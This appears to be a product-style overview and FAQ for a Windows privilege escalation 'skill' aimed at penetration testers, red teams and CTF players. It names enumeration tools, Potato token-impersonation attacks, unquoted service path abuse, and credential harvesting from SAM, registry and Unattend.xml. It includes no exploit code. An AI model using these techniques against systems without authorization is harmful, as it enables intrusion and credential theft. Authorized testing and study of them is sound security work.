Windows Privilege Escalation

Windows Privilege Escalation

Skill Overview

Windows privilege escalation skills provide a systematic approach to discovering and exploiting privilege escalation vulnerabilities in Windows environments. Covering system enumeration, credential collection, service exploitation, token impersonation, kernel vulnerability exploitation, and Windows configuration misconfiguration exploitation, it helps penetration testers escalate from standard user privileges to administrator or SYSTEM privileges.

Use Cases

1. Post-Exploitation Phase in Penetration Testing

Use this when you have already obtained a standard user shell or RDP access to the target Windows system and need to escalate privileges to gain greater control. This is a key step in internal network penetration and lateral movement, and also a common privilege escalation scenario in red team operations.

2. Authorized Security Assessments and Red Team Exercises

When conducting authorized security assessments or red team exercises, you need to discover and verify Windows privilege escalation vulnerabilities, assess security risks in the organization’s Windows environment, and provide remediation recommendations and security hardening plans.

3. CTF Competitions and Security Research

In CTF competitions involving Windows challenges, you need to use various Windows privilege escalation techniques to obtain flags. For security research, you should deeply understand the Windows security model and privilege escalation principles to discover new vulnerabilities.

Core Features

1. System Enumeration and Vulnerability Discovery

Provide comprehensive Windows system enumeration methods, including system information collection, user privilege checks, network configuration enumeration, service configuration analysis, and more. Includes commands to invoke professional tools such as WinPEAS, PowerUp, and Seatbelt, helping quickly identify exploitable privilege escalation vectors such as misconfigured services, unquoted paths, and weak permission configurations.

2. Credential Collection and Exploitation

Cover multiple credential collection techniques in Windows environments, including extracting SAM and SYSTEM files, exploiting HiveNightmare (CVE-2021-36934), searching for registry-stored passwords, extracting credentials from Unattend.xml, retrieving WiFi passwords, analyzing PowerShell history, and more—helping uncover hard-coded credentials and sensitive information in the system.

3. Service and Token Exploitation

Provide Windows service exploitation methods, including modifying service permissions, exploiting unquoted service paths, and exploiting AlwaysInstallElevated vulnerabilities. Explain token impersonation techniques in detail, including the usage scenarios and Windows version compatibility of tools such as JuicyPotato, PrintSpoofer, RoguePotato, and GodPotato, as well as methods for abusing critical privileges such as SeImpersonatePrivilege.

Common Questions

What are common methods for Windows privilege escalation?

Common Windows privilege escalation methods include: exploiting service vulnerabilities (weak permissions, unquoted paths), token impersonation (SeImpersonatePrivilege abuse), kernel exploitation (unpatched CVEs), credential collection (registry, configuration files), DLL hijacking, and misconfiguration exploitation (AlwaysInstallElevated), among others. It is recommended to first use WinPEAS or PowerUp for automated enumeration, then choose the appropriate exploitation method based on the discovered vulnerability vectors.

What is the difference between WinPEAS and PowerUp?

WinPEAS is an all-in-one enumeration tool that checks configurations across the system and outputs comprehensive results—typically with a large information volume. PowerUp focuses on service- and path-related vulnerabilities and outputs more precise findings. In real use, you can first run PowerUp to quickly discover service-related vulnerabilities, then use WinPEAS for a full system check. Both are PowerShell scripts and can be executed directly on the target machine.

How do you use SeImpersonatePrivilege?

SeImpersonatePrivilege is a high-value privilege that enables token impersonation and is commonly found on service accounts. Exploitation methods include: JuicyPotato (Windows Server 2019 and below), PrintSpoofer (Windows 10 and Server 2019+), RoguePotato (OXID resolver abuse), and GodPotato (latest versions). First use whoami /priv to confirm whether you have this privilege, then select the appropriate Potato attack tool based on the system version.

What is the principle behind Windows service privilege escalation?

Windows service privilege escalation primarily relies on service configuration mistakes: (1) weak permission settings, where a standard user can modify the service binary path and replace it with a malicious program; (2) unquoted paths—if a service path such as C:\Program Files\App\service.exe is not enclosed in quotes, the system may execute C:\Program.exe first, allowing you to place a malicious file at that location. Use accesschk.exe to check permissions and wmic service to find unquoted paths.

How do you detect Windows privilege escalation vulnerabilities?

Detection methods include: using WinPEAS/PowerUp for automated scanning; manually checking service permissions (accesschk.exe); querying unquoted paths (wmic service); checking privilege assignments (whoami /priv); finding auto-logon credentials (registry); analyzing scheduled task configurations (schtasks); and checking kernel patch status (Watson, Windows Exploit Suggester). From a defensive perspective, reduce privilege escalation risk by limiting service permissions, enabling UAC, promptly applying patches, and monitoring abnormal processes.

What risks are involved in Windows kernel vulnerability exploitation?

Kernel vulnerability exploitation may cause system blue screen crashes, trigger AV/EDR alerts, and leave obvious log artifacts. It is recommended to prioritize configuration misconfiguration and service vulnerability exploitation, using kernel exploitation only as a last resort. Before using it, confirm missing patches with Watson or Windows Exploit Suggester, choose a compatible exploit, validate in a test environment, and then apply only when appropriate.

What permissions are needed for Windows privilege escalation?

Most Windows privilege escalation techniques can be executed with standard user privileges alone. Exceptions include: kernel exploitation may require a specific version environment; some service exploits require permissions to start/stop services; and token impersonation typically requires a service account context. In actual penetration testing, the standard user shell gained during initial access is usually sufficient to start privilege escalation enumeration and exploitation.

What methods are used for Windows credential collection?

Windows credential collection methods include: exporting SAM and SYSTEM files and using Mimikatz to extract hashes; exploiting HiveNightmare to read volume shadow copies; searching for passwords in the registry (auto-logon, PuTTY, VNC); extracting credentials from Unattend.xml and Sysprep files; retrieving plaintext WiFi passwords; reading PowerShell history; checking saved browser passwords; and using RDP password cracking tools, among others.